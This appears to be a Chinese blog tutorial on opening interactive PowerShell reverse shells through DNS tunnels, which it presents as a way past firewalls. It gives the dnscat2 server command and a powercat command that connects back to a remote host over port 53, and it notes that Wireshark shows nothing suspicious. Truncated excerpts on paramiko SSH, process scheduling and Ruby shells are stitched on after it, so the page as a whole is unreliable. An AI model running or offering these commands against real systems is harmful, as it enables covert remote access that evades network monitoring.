摘自:
歡迎來到一周powershell指令碼的第五天,今天我們將討論使用icmp和dns的互動式powershell指令碼。
通常情況下防火牆都不會主動過濾icmp和dns資料報,這就讓我們可以使用它們。下面就讓我們來看看具體怎麼利用吧。
對於dns來說,我們需要使用ron bowes的dnscat2(作為服務端。當然如果目標機器是windows系統,那麼也可以使用powercat(我們之前討論過使用powercat了,那麼下面來看看如何使用dnscat2。
首先,使用如下命令開啟dnscat2服務端:
root@kali:~/desktop# ruby ./dnscat2.rb reversedns-shell.org然後使用如下命令返回連線:
ps c:\> powercat -c 192.168.254.226-p 53-dns reversedns-shell.org效果如下:
很好!我們得到了乙個通過dns通道傳輸的互動式powershell指令碼。
這裡如果我們檢視wireshark的話不會發現有什麼問題:
上面的不是powershell指令碼對吧,其實nishang有一些使用dns的指令碼可以執行命令、指令碼和msf的shellcode利用,但它們都不是互動式的指令碼,所以這裡就不提了,如果感興趣可以檢視之前的博文
通過paramiko互動式執行bash 命令
usr bin python coding utf 8 import paramiko 例項化sshclient client paramiko.sshclient 自動新增策略,儲存伺服器的主機名和金鑰資訊,如果不新增,那麼不再本地know hosts檔案中記錄的主機將無法連線 client.se...
互動式系統中的排程
1.輪轉排程 每個程序被分配乙個時間段,稱為時間片 quantum 即允許該程序在該時間段中執行。如果在時間片結束時該程序還在執行,則將剝奪cpu並分配給另乙個程序。如果該程序在時間片結束前阻塞或結束,則cpu立即進行切換。時間片輪轉排程很容易實現,排程程式所要做的就是維護一張可執行程序列表,如圖2...
ruby開發的互動式程式例子
實現pry,ronin,msf類似的終端下互動功能,這裡主要用到了ripl gem 1.能夠呼叫定義的方法,如help 2.能夠執行系統命令 3.能夠類似irb pry進行ruby語言解析 安裝 gem install ripl gem install ripl shell commands 示例r...